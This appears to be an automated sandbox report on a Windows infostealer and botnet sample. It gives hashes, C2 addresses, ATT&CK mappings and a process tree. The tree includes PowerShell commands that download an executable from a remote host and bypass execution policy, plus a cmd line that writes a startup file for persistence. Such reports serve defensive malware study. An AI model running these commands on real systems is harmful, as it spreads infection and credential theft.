socks5systemz | b5eaf10fcee125295402478e086f6e3c441024daec47dde0170ba528525f1eb2

Analysis

max time kernel
149s
max time network
150s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
11-10-2024 20:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6706ad721d914_JuidePorison.exe
Size

8.6MB
MD5

54e6bcf9be550a5b8e5cd7b83318942d
SHA1

0c9084c04d5dd833867a60376c0809e8276fd869
SHA256

b5eaf10fcee125295402478e086f6e3c441024daec47dde0170ba528525f1eb2
SHA512

afed87e898d00a146c42f4c81b86fe5c243c205fabb3296d757915bc427bfa8fe91d7cad48a4d36f427168b90011d8ce05e8b3003ccf47f0a3e3ab5151eefd1f
SSDEEP

196608:CkQm7e7eIqv9n2vYLIRQ6SSQCpX67SfUDTsmpfCcXe+8BvSk:CkQm7e7eIqvF2vRCApXVwTsmpfCcL8g

Score

10^/10

socks5systemz stealc vidar b3f4e62dbdd6721134cbcb95ba248e90 default default7_doz botnet credential_access discovery execution spyware stealer

Malware Config

Extracted

Family

stealc

Botnet

default

http://194.246.83.76

Attributes

url_path
/a238cad009777d38.php

Extracted

Family

stealc

Botnet

default7_doz

http://62.204.41.176

Attributes

url_path
/edd20096ecef326d.php

Extracted

Family

vidar

Version

11.1

Botnet

b3f4e62dbdd6721134cbcb95ba248e90

https://steamcommunity.com/profiles/76561199786602107

https://t.me/lpnjoke

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://my.cloudme.com/v1/ws2/:usefullbox/:real/real.txt

Signatures

Detect Socks5Systemz Payload 1 IoCs

resource	yara_rule
behavioral2/memory/772-307-0x0000000000A30000-0x0000000000AD2000-memory.dmp	family_socks5systemz

Detect Vidar Stealer 10 IoCs

stealer

resource	yara_rule
behavioral2/memory/3512-140-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-142-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-196-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-220-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-236-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-244-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-260-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-267-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-268-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7
behavioral2/memory/3512-269-0x0000000000400000-0x0000000000676000-memory.dmp	family_vidar_v7

Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 216 created 3308	216	Guard.exe	54
PID 216 created 3308	216	Guard.exe	54
PID 216 created 3308	216	Guard.exe	54

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Blocklisted process makes network request 2 IoCs

flow	pid	Process
33	4416	powershell.exe
42	4648	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4648	powershell.exe
4416	powershell.exe

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe

Executes dropped EXE 16 IoCs

pid	Process
4720	rvGauxPWm4TrcUtgejntC0lo.exe
1368	NzB7h7VL64fj67g9vSuCaTfn.exe
32	KIObxDER3B0FUAGY2F3oD9MU.exe
1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
872	6nIHL5grkrAWTOzTybyKUYvN.exe
2696	is-LGJMR.tmp
772	middlemediaplayer.exe
1808	6nIHL5grkrAWTOzTybyKUYvN.exe
380	6nIHL5grkrAWTOzTybyKUYvN.exe
372	6nIHL5grkrAWTOzTybyKUYvN.exe
1440	6nIHL5grkrAWTOzTybyKUYvN.exe
2280	6nIHL5grkrAWTOzTybyKUYvN.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
216	Guard.exe
3808	jsc.exe
4848	jsc.exe

Loads dropped DLL 3 IoCs

pid	Process
2696	is-LGJMR.tmp
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	45.155.250.90

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000800000001ac4b-22.dat	autoit_exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1368 set thread context of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 872 set thread context of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 1592 set thread context of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 4848 set thread context of 4368	4848	jsc.exe	103

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
392	1368	WerFault.exe	75
2872	872	WerFault.exe	77
4412	1592	WerFault.exe	76
3064	2156	WerFault.exe	79

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NzB7h7VL64fj67g9vSuCaTfn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6nIHL5grkrAWTOzTybyKUYvN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	is-LGJMR.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	middlemediaplayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6nIHL5grkrAWTOzTybyKUYvN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KIObxDER3B0FUAGY2F3oD9MU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Guard.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6706ad721d914_JuidePorison.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Hgbq1qB1mGsfhnqPFptMQZoJ.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
4684	6706ad721d914_JuidePorison.exe
4684	6706ad721d914_JuidePorison.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe
2156	MSBuild.exe
2156	MSBuild.exe
4368	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeBackupPrivilege	4368	RegAsm.exe
Token: SeSecurityPrivilege	4368	RegAsm.exe
Token: SeSecurityPrivilege	4368	RegAsm.exe
Token: SeSecurityPrivilege	4368	RegAsm.exe
Token: SeSecurityPrivilege	4368	RegAsm.exe
Token: SeDebugPrivilege	4368	RegAsm.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
4720	rvGauxPWm4TrcUtgejntC0lo.exe
216	Guard.exe
216	Guard.exe
216	Guard.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3512	Hgbq1qB1mGsfhnqPFptMQZoJ.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4684 wrote to memory of 4720	4684	6706ad721d914_JuidePorison.exe	73
PID 4684 wrote to memory of 4720	4684	6706ad721d914_JuidePorison.exe	73
PID 4684 wrote to memory of 1368	4684	6706ad721d914_JuidePorison.exe	75
PID 4684 wrote to memory of 1368	4684	6706ad721d914_JuidePorison.exe	75
PID 4684 wrote to memory of 1368	4684	6706ad721d914_JuidePorison.exe	75
PID 4684 wrote to memory of 1592	4684	6706ad721d914_JuidePorison.exe	76
PID 4684 wrote to memory of 1592	4684	6706ad721d914_JuidePorison.exe	76
PID 4684 wrote to memory of 1592	4684	6706ad721d914_JuidePorison.exe	76
PID 4684 wrote to memory of 32	4684	6706ad721d914_JuidePorison.exe	74
PID 4684 wrote to memory of 32	4684	6706ad721d914_JuidePorison.exe	74
PID 4684 wrote to memory of 32	4684	6706ad721d914_JuidePorison.exe	74
PID 4684 wrote to memory of 872	4684	6706ad721d914_JuidePorison.exe	77
PID 4684 wrote to memory of 872	4684	6706ad721d914_JuidePorison.exe	77
PID 4684 wrote to memory of 872	4684	6706ad721d914_JuidePorison.exe	77
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 32 wrote to memory of 2696	32	KIObxDER3B0FUAGY2F3oD9MU.exe	78
PID 32 wrote to memory of 2696	32	KIObxDER3B0FUAGY2F3oD9MU.exe	78
PID 32 wrote to memory of 2696	32	KIObxDER3B0FUAGY2F3oD9MU.exe	78
PID 4720 wrote to memory of 4416	4720	rvGauxPWm4TrcUtgejntC0lo.exe	80
PID 4720 wrote to memory of 4416	4720	rvGauxPWm4TrcUtgejntC0lo.exe	80
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 1368 wrote to memory of 2156	1368	NzB7h7VL64fj67g9vSuCaTfn.exe	79
PID 2696 wrote to memory of 772	2696	is-LGJMR.tmp	84
PID 2696 wrote to memory of 772	2696	is-LGJMR.tmp	84
PID 2696 wrote to memory of 772	2696	is-LGJMR.tmp	84
PID 872 wrote to memory of 380	872	6nIHL5grkrAWTOzTybyKUYvN.exe	85
PID 872 wrote to memory of 380	872	6nIHL5grkrAWTOzTybyKUYvN.exe	85
PID 872 wrote to memory of 380	872	6nIHL5grkrAWTOzTybyKUYvN.exe	85
PID 872 wrote to memory of 1808	872	6nIHL5grkrAWTOzTybyKUYvN.exe	86
PID 872 wrote to memory of 1808	872	6nIHL5grkrAWTOzTybyKUYvN.exe	86
PID 872 wrote to memory of 1808	872	6nIHL5grkrAWTOzTybyKUYvN.exe	86
PID 872 wrote to memory of 372	872	6nIHL5grkrAWTOzTybyKUYvN.exe	87
PID 872 wrote to memory of 372	872	6nIHL5grkrAWTOzTybyKUYvN.exe	87
PID 872 wrote to memory of 372	872	6nIHL5grkrAWTOzTybyKUYvN.exe	87
PID 872 wrote to memory of 1440	872	6nIHL5grkrAWTOzTybyKUYvN.exe	88
PID 872 wrote to memory of 1440	872	6nIHL5grkrAWTOzTybyKUYvN.exe	88
PID 872 wrote to memory of 1440	872	6nIHL5grkrAWTOzTybyKUYvN.exe	88
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 872 wrote to memory of 2280	872	6nIHL5grkrAWTOzTybyKUYvN.exe	89
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 1592 wrote to memory of 3512	1592	Hgbq1qB1mGsfhnqPFptMQZoJ.exe	91
PID 4720 wrote to memory of 4648	4720	rvGauxPWm4TrcUtgejntC0lo.exe	93
PID 4720 wrote to memory of 4648	4720	rvGauxPWm4TrcUtgejntC0lo.exe	93

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3308
- C:\Users\Admin\AppData\Local\Temp\6706ad721d914_JuidePorison.exe
  "C:\Users\Admin\AppData\Local\Temp\6706ad721d914_JuidePorison.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4684
- - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\rvGauxPWm4TrcUtgejntC0lo.exe
    C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\rvGauxPWm4TrcUtgejntC0lo.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:usefullbox/:real_1/real" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4648
    - - C:\Users\Public\Guard.exe
        
        "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:216
- - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\KIObxDER3B0FUAGY2F3oD9MU.exe
    C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\KIObxDER3B0FUAGY2F3oD9MU.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:32
  - - C:\Users\Admin\AppData\Local\Temp\is-NM91P.tmp\is-LGJMR.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-NM91P.tmp\is-LGJMR.tmp" /SL4 $801FC "C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\KIObxDER3B0FUAGY2F3oD9MU.exe" 3960739 52224
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2696
    - - C:\Users\Admin\AppData\Local\Middle Media Player\middlemediaplayer.exe
        
        "C:\Users\Admin\AppData\Local\Middle Media Player\middlemediaplayer.exe" -i
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:772
- - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\NzB7h7VL64fj67g9vSuCaTfn.exe
    C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\NzB7h7VL64fj67g9vSuCaTfn.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:2156
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 1136
        5⤵
        Program crash
        
        PID:3064
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 292
      4⤵
      Program crash
      PID:392
- - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\Hgbq1qB1mGsfhnqPFptMQZoJ.exe
    C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\Hgbq1qB1mGsfhnqPFptMQZoJ.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\Hgbq1qB1mGsfhnqPFptMQZoJ.exe
      "C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\Hgbq1qB1mGsfhnqPFptMQZoJ.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:3512
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 244
      4⤵
      Program crash
      PID:4412
- - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe
    C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:872
  - - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe
      "C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe"
      4⤵
      Executes dropped EXE
      PID:380
  - - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe
      "C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe"
      4⤵
      Executes dropped EXE
      PID:1808
  - - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe
      "C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe"
      4⤵
      Executes dropped EXE
      PID:372
  - - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe
      "C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe"
      4⤵
      Executes dropped EXE
      PID:1440
  - - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe
      "C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\6nIHL5grkrAWTOzTybyKUYvN.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2280
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 872 -s 276
      4⤵
      Program crash
      PID:2872
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:4284
- C:\Users\Public\jsc.exe
  C:\Users\Public\jsc.exe
  2⤵
  - Executes dropped EXE
  PID:3808
- C:\Users\Public\jsc.exe
  C:\Users\Public\jsc.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4848
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b64702f3a27232ce1d0c5683d6785c8c

SHA1
0fc81be3daf0a2ccbaf6fef0cb275414ee2069ca

SHA256
e7f9f173717e8daf2429aafa99685f2f88c71729a27c57d074071d47a456c69b

SHA512
633f1fbcf92a29b79d86eb8681a7a81eb2fb28482e480c1b15b1d70f1f7d60c462b1cb6996c45a6881c03f0b4245a1fbf48e621bbbd1252583eca00d669010ff

Download Submit
C:\Users\Admin\AppData\Local\Middle Media Player\middlemediaplayer.exe

Filesize
3.8MB

MD5
b18bc890142dafafa5b2d6bd9f578af4

SHA1
2001995e693cedcf7c6ddbed64fcea2eec2bd6bc

SHA256
87d1a53293dd226a27620cf479bc41d457f8bbc7da775a69c4426de7e22eead6

SHA512
e398b96d6b1315dfa823f90ad6eb4fcaab825c83e0ea0c0c94974eedf235b0bd53bb1fd36b0e5f62a858313d30e0da62c306728d3a7c793692f450fe951cf106

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mytcfe55.rla.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-NM91P.tmp\is-LGJMR.tmp

Filesize
647KB

MD5
321dc40b1028537e9da09d6cad16b524

SHA1
419dc3963cfe7cdf66a1e23718c52d4dc1623d51
